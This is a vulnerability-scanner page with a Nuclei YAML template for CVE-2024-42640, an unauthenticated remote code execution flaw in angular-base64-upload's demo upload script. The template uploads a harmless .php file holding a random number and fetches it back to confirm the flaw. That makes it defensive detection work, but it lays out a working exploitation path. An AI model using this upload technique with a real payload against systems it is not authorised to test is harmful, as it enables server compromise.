Angular-Base64-Upload - Remote Code Execution
ID: CVE-2024-42640
Severity: critical
Author: s4e-io
Tags: cve,cve2024,angular,rce
Description
Section titled “Description”angular-base64-upload prior to v0.1.21 is vulnerable to unauthenticated remote code execution via demo/server.php. Exploiting this vulnerability allows an attacker to upload arbitrary content to the server, which can subsequently be accessed through demo/uploads. This leads to the execution of previously uploaded content and enables the attacker to achieve code execution on the server. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
YAML Source
Section titled “YAML Source”id: CVE-2024-42640
info: name: Angular-Base64-Upload - Remote Code Execution author: s4e-io severity: critical description: | angular-base64-upload prior to v0.1.21 is vulnerable to unauthenticated remote code execution via demo/server.php. Exploiting this vulnerability allows an attacker to upload arbitrary content to the server, which can subsequently be accessed through demo/uploads. This leads to the execution of previously uploaded content and enables the attacker to achieve code execution on the server. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. reference: - https://github.com/rvizx/CVE-2024-42640 - https://www.zyenra.com/blog/unauthenticated-rce-in-angular-base64-upload.html - https://github.com/adonespitogo/angular-base64-upload - https://nvd.nist.gov/vuln/detail/CVE-2024-42640 classification: cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H cvss-score: 10 cve-id: CVE-2024-42640 cwe-id: CWE-94 epss-score: 0.00043 epss-percentile: 0.09695 metadata: max-request: 4 tags: cve,cve2024,angular,rce
variables: filename: "{{to_lower(rand_text_alpha(12))}}" num: "{{rand_int(1000000,9999999)}}"
flow: http(1) && http(2)
http: - raw: - | POST /node_modules/angular-base64-upload/demo/server.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/json
{"base64": "{{base64(num)}}", "filename": "{{filename}}.php"}
- | POST /bower_components/angular-base64-upload/demo/server.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/json
{"base64": "{{base64(num)}}", "filename": "{{filename}}.php"}
matchers: - type: dsl dsl: - 'contains(body_1,"uploads/{{filename}}.php") || contains(body_2,"uploads/{{filename}}.php") ' - 'status_code_1 == 200 || status_code_2 == 200' condition: and internal: true
- raw: - | GET /node_modules/angular-base64-upload/demo/uploads/{{filename}}.php HTTP/1.1 Host: {{Hostname}}
- | GET /bower_components/angular-base64-upload/demo/uploads/{{filename}}.php HTTP/1.1 Host: {{Hostname}}
matchers: - type: dsl dsl: - 'contains(body_3, "{{num}}") || contains(body_4, "{{num}}")' - 'status_code_3 == 200 || status_code_4 == 200' condition: and# digest: 4a0a00473045022100d6147d40c50269d04a06ca3a6f1082d41307d34331cd141f78e769ac536b3751022021058b90109b4b2f905f5a20fa02eda12586b5454b8ac138ff2fdaca86a21d0d:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-42640.yaml"